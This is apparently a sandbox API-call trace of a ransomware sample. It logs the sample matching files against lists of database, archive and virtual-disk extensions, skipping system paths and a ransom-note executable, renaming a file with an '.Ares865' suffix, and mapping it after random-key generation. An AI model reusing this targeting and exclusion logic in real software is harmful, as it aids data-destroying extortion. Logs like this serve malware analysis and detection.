1 [0088.176] lstrlenW (lpString="idb") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.176] lstrlenW (lpString="ihx") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.176] lstrlenW (lpString="itdb") returned 4 [0088.176] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.176] lstrlenW (lpString="itw") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.176] lstrlenW (lpString="jet") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.176] lstrlenW (lpString="jtx") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.176] lstrlenW (lpString="kdb") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.176] lstrlenW (lpString="kexi") returned 4 [0088.176] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.176] lstrlenW (lpString="kexic") returned 5 [0088.176] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.176] lstrlenW (lpString="kexis") returned 5 [0088.176] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.176] lstrlenW (lpString="lgc") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.176] lstrlenW (lpString="lwx") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.176] lstrlenW (lpString="maf") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.176] lstrlenW (lpString="maq") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.176] lstrlenW (lpString="mar") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.176] lstrlenW (lpString="marshal") returned 7 [0088.177] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.177] lstrlenW (lpString="mas") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.177] lstrlenW (lpString="mav") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.177] lstrlenW (lpString="maw") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.177] lstrlenW (lpString="mdbhtml") returned 7 [0088.177] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.177] lstrlenW (lpString="mdn") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.177] lstrlenW (lpString="mdt") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.177] lstrlenW (lpString="mfd") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.177] lstrlenW (lpString="mpd") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.177] lstrlenW (lpString="mrg") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.177] lstrlenW (lpString="mud") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.177] lstrlenW (lpString="mwb") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.177] lstrlenW (lpString="myd") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.177] lstrlenW (lpString="ndf") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.177] lstrlenW (lpString="nnt") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.177] lstrlenW (lpString="nrmlib") returned 6 [0088.177] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.177] lstrlenW (lpString="ns2") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.177] lstrlenW (lpString="ns3") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.177] lstrlenW (lpString="ns4") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.177] lstrlenW (lpString="nsf") returned 3 [0088.177] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.178] lstrlenW (lpString="nv") returned 2 [0088.178] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.178] lstrlenW (lpString="nv2") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.178] lstrlenW (lpString="nwdb") returned 4 [0088.178] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.178] lstrlenW (lpString="nyf") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.178] lstrlenW (lpString="odb") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.178] lstrlenW (lpString="odb") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.178] lstrlenW (lpString="oqy") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.178] lstrlenW (lpString="ora") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.178] lstrlenW (lpString="orx") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.178] lstrlenW (lpString="owc") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.178] lstrlenW (lpString="p96") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.178] lstrlenW (lpString="p97") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.178] lstrlenW (lpString="pan") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.178] lstrlenW (lpString="pdb") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.178] lstrlenW (lpString="pdm") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.178] lstrlenW (lpString="pnz") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.178] lstrlenW (lpString="qry") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.178] lstrlenW (lpString="qvd") returned 3 [0088.178] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.178] lstrlenW (lpString="rbf") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.179] lstrlenW (lpString="rctd") returned 4 [0088.179] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.179] lstrlenW (lpString="rod") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.179] lstrlenW (lpString="rodx") returned 4 [0088.179] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.179] lstrlenW (lpString="rpd") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.179] lstrlenW (lpString="rsd") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.179] lstrlenW (lpString="sas7bdat") returned 8 [0088.179] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.179] lstrlenW (lpString="sbf") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.179] lstrlenW (lpString="scx") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.179] lstrlenW (lpString="sdb") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.179] lstrlenW (lpString="sdc") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.179] lstrlenW (lpString="sdf") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.179] lstrlenW (lpString="sis") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.179] lstrlenW (lpString="spq") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.179] lstrlenW (lpString="te") returned 2 [0088.179] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.179] lstrlenW (lpString="teacher") returned 7 [0088.179] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.179] lstrlenW (lpString="tmd") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.179] lstrlenW (lpString="tps") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.179] lstrlenW (lpString="trc") returned 3 [0088.179] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.179] lstrlenW (lpString="trc") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.180] lstrlenW (lpString="trm") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.180] lstrlenW (lpString="udb") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.180] lstrlenW (lpString="udl") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.180] lstrlenW (lpString="usr") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.180] lstrlenW (lpString="v12") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.180] lstrlenW (lpString="vis") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.180] lstrlenW (lpString="vpd") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.180] lstrlenW (lpString="vvv") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.180] lstrlenW (lpString="wdb") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.180] lstrlenW (lpString="wmdb") returned 4 [0088.180] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.180] lstrlenW (lpString="wrk") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.180] lstrlenW (lpString="xdb") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.180] lstrlenW (lpString="xld") returned 3 [0088.180] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.180] lstrlenW (lpString="xmlff") returned 5 [0088.180] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.180] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.Ares865") returned 78 [0088.180] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.181] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.181] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=52576) returned 1 [0088.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.182] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.183] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.183] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.183] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd060, lpName=0x0) returned 0x15c [0088.184] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd060) returned 0x190000 [0088.187] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.188] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.188] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0088.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0088.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.188] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0088.189] CloseHandle (hObject=0x15c) returned 1 [0088.189] CloseHandle (hObject=0x118) returned 1 [0088.189] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.189] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.189] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.189] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cef6000, ftCreationTime.dwHighDateTime=0x1cac803, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7cef6000, ftLastWriteTime.dwHighDateTime=0x1cac803, nFileSizeHigh=0x0, nFileSizeLow=0x45f60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PPINTL.REST.trx_dll", cAlternateFileName="PPINTL~2.TRX")) returned 1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".") returned 1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="..") returned 1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="windows") returned -1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="bootmgr") returned 1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="temp") returned -1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="pagefile.sys") returned 1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="boot") returned 1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="ids.txt") returned 1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="perflogs") returned 1 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="MSBuild") returned 1 [0088.190] lstrlenW (lpString="PPINTL.REST.trx_dll") returned 19 [0088.190] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned 70 [0088.190] lstrcpyW (in: lpString1=0x2cce468, lpString2="PPINTL.REST.trx_dll" | out: lpString1="PPINTL.REST.trx_dll") returned="PPINTL.REST.trx_dll" [0088.190] lstrlenW (lpString="PPINTL.REST.trx_dll") returned 19 [0088.190] lstrlenW (lpString="Ares865") returned 7 [0088.190] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.190] lstrlenW (lpString=".dll") returned 4 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".dll") returned 1 [0088.190] lstrlenW (lpString=".lnk") returned 4 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".lnk") returned 1 [0088.190] lstrlenW (lpString=".ini") returned 4 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".ini") returned 1 [0088.190] lstrlenW (lpString=".sys") returned 4 [0088.190] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".sys") returned 1 [0088.190] lstrlenW (lpString="PPINTL.REST.trx_dll") returned 19 [0088.190] lstrlenW (lpString="bak") returned 3 [0088.190] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.190] lstrlenW (lpString="ba_") returned 3 [0088.190] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.190] lstrlenW (lpString="dbb") returned 3 [0088.190] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.190] lstrlenW (lpString="vmdk") returned 4 [0088.190] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.191] lstrlenW (lpString="rar") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.191] lstrlenW (lpString="zip") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.191] lstrlenW (lpString="tgz") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.191] lstrlenW (lpString="vbox") returned 4 [0088.191] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.191] lstrlenW (lpString="vdi") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.191] lstrlenW (lpString="vhd") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.191] lstrlenW (lpString="vhdx") returned 4 [0088.191] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.191] lstrlenW (lpString="avhd") returned 4 [0088.191] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.191] lstrlenW (lpString="db") returned 2 [0088.191] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.191] lstrlenW (lpString="db2") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.191] lstrlenW (lpString="db3") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.191] lstrlenW (lpString="dbf") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.191] lstrlenW (lpString="mdf") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.191] lstrlenW (lpString="mdb") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.191] lstrlenW (lpString="sql") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.191] lstrlenW (lpString="sqlite") returned 6 [0088.191] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.191] lstrlenW (lpString="sqlite3") returned 7 [0088.191] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.191] lstrlenW (lpString="sqlitedb") returned 8 [0088.191] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.191] lstrlenW (lpString="xml") returned 3 [0088.191] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.191] lstrlenW (lpString="$er") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.192] lstrlenW (lpString="4dd") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.192] lstrlenW (lpString="4dl") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.192] lstrlenW (lpString="^^^") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.192] lstrlenW (lpString="abs") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.192] lstrlenW (lpString="abx") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.192] lstrlenW (lpString="accdb") returned 5 [0088.192] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.192] lstrlenW (lpString="accdc") returned 5 [0088.192] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.192] lstrlenW (lpString="accde") returned 5 [0088.192] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.192] lstrlenW (lpString="accdr") returned 5 [0088.192] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.192] lstrlenW (lpString="accdt") returned 5 [0088.192] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.192] lstrlenW (lpString="accdw") returned 5 [0088.192] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.192] lstrlenW (lpString="accft") returned 5 [0088.192] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.192] lstrlenW (lpString="adb") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.192] lstrlenW (lpString="adb") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.192] lstrlenW (lpString="ade") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.192] lstrlenW (lpString="adf") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.192] lstrlenW (lpString="adn") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.192] lstrlenW (lpString="adp") returned 3 [0088.192] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.192] lstrlenW (lpString="alf") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.193] lstrlenW (lpString="ask") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.193] lstrlenW (lpString="btr") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.193] lstrlenW (lpString="cat") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.193] lstrlenW (lpString="cdb") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.193] lstrlenW (lpString="ckp") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.193] lstrlenW (lpString="cma") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.193] lstrlenW (lpString="cpd") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.193] lstrlenW (lpString="dacpac") returned 6 [0088.193] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.193] lstrlenW (lpString="dad") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.193] lstrlenW (lpString="dadiagrams") returned 10 [0088.193] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0088.193] lstrlenW (lpString="daschema") returned 8 [0088.193] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.193] lstrlenW (lpString="db-journal") returned 10 [0088.193] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0088.193] lstrlenW (lpString="db-shm") returned 6 [0088.193] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.193] lstrlenW (lpString="db-wal") returned 6 [0088.193] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.193] lstrlenW (lpString="dbc") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.193] lstrlenW (lpString="dbs") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.193] lstrlenW (lpString="dbt") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.193] lstrlenW (lpString="dbv") returned 3 [0088.193] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.193] lstrlenW (lpString="dbx") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.194] lstrlenW (lpString="dcb") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.194] lstrlenW (lpString="dct") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.194] lstrlenW (lpString="dcx") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.194] lstrlenW (lpString="ddl") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.194] lstrlenW (lpString="dlis") returned 4 [0088.194] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.194] lstrlenW (lpString="dp1") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.194] lstrlenW (lpString="dqy") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.194] lstrlenW (lpString="dsk") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.194] lstrlenW (lpString="dsn") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.194] lstrlenW (lpString="dtsx") returned 4 [0088.194] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.194] lstrlenW (lpString="dxl") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.194] lstrlenW (lpString="eco") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.194] lstrlenW (lpString="ecx") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.194] lstrlenW (lpString="edb") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.194] lstrlenW (lpString="epim") returned 4 [0088.194] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.194] lstrlenW (lpString="fcd") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.194] lstrlenW (lpString="fdb") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.194] lstrlenW (lpString="fic") returned 3 [0088.194] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.194] lstrlenW (lpString="flexolibrary") returned 12 [0088.194] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0088.195] lstrlenW (lpString="fm5") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.195] lstrlenW (lpString="fmp") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.195] lstrlenW (lpString="fmp12") returned 5 [0088.195] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.195] lstrlenW (lpString="fmpsl") returned 5 [0088.195] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.195] lstrlenW (lpString="fol") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.195] lstrlenW (lpString="fp3") returned 